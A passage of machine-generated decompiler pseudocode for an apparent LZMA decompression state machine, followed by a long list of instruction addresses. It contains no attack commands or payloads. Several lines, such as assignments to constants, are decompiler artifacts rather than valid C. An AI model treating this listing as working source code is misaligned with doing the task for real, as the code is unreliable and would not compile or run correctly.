											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













              0x00000000
              0x00406f64
              0x00406f64
              0x00406f68
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f73
              0x00406f80
              0x00406f83
              0x004072c7
              0x004072c7
              0x004072ca
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00407318
              0x0040731c
              0x004074cb
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x004074fd
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x004072c7
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
